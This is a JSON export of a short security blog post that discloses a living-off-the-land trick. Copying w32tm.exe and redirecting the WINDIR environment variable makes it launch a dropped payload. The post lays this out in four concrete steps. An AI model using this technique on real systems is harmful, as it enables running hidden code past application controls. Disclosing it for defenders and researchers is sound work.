{"id":9108,"date":"2024-03-16T22:18:38","date_gmt":"2024-03-16T22:18:38","guid":{"rendered":"https:\/\/www.hexacorn.com\/blog\/?p=9108"},"modified":"2024-03-16T22:18:38","modified_gmt":"2024-03-16T22:18:38","slug":"lolbin-wow-ltd-x-2","status":"publish","type":"post","link":"https:\/\/www.hexacorn.com\/blog\/2024\/03\/16\/lolbin-wow-ltd-x-2\/","title":{"rendered":"Lolbin Wow Ltd x 2"},"content":{"rendered":"\n<p>I have already <a href=\"https:\/\/www.hexacorn.com\/blog\/2020\/05\/23\/lolbin-wow-ltd\/\" data-type=\"post\" data-id=\"7214\">covered<\/a> <a href=\"https:\/\/www.hexacorn.com\/blog\/2020\/05\/23\/lolbin-ltd\/\" data-type=\"post\" data-id=\"7195\">cases<\/a> where I abused the WINDIR environment variable to LOLBINize some WoW executables.<\/p>\n\n\n\n<p>I thought I covered w32tm.exe before, but looking at my blog history I can&#8217;t find any reference to it.<\/p>\n\n\n\n<p>So, here it is:<\/p>\n\n\n\n<ol>\n<li>copy c:\\WINDOWS\\SysWOW64\\w32tm.exe .<\/li>\n\n\n\n<li>set windir=c:\\test<\/li>\n\n\n\n<li>drop payload as c:\\test\\sysnative\\w32tm.exe<\/li>\n\n\n\n<li>execute c:\\test\\w32tm.exe<\/li>\n<\/ol>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.hexacorn.com\/blog\/wp-content\/uploads\/2024\/03\/w32rtm.png\"><img decoding=\"async\" loading=\"lazy\" width=\"314\" height=\"141\" src=\"https:\/\/www.hexacorn.com\/blog\/wp-content\/uploads\/2024\/03\/w32rtm.png\" alt=\"\" class=\"wp-image-9109\" srcset=\"https:\/\/www.hexacorn.com\/blog\/wp-content\/uploads\/2024\/03\/w32rtm.png 314w, https:\/\/www.hexacorn.com\/blog\/wp-content\/uploads\/2024\/03\/w32rtm-300x135.png 300w\" sizes=\"(max-width: 314px) 100vw, 314px\" \/><\/a><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>I have already covered cases where I abused the WINDIR environment variable to LOLBINize some WoW executables. I thought I covered w32tm.exe before, but looking at my blog history I can&#8217;t find any reference to it. So, here it is:<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[64],"tags":[],"_links":{"self":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/9108"}],"collection":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/comments?post=9108"}],"version-history":[{"count":1,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/9108\/revisions"}],"predecessor-version":[{"id":9110,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/9108\/revisions\/9110"}],"wp:attachment":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/media?parent=9108"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/categories?post=9108"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/tags?post=9108"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}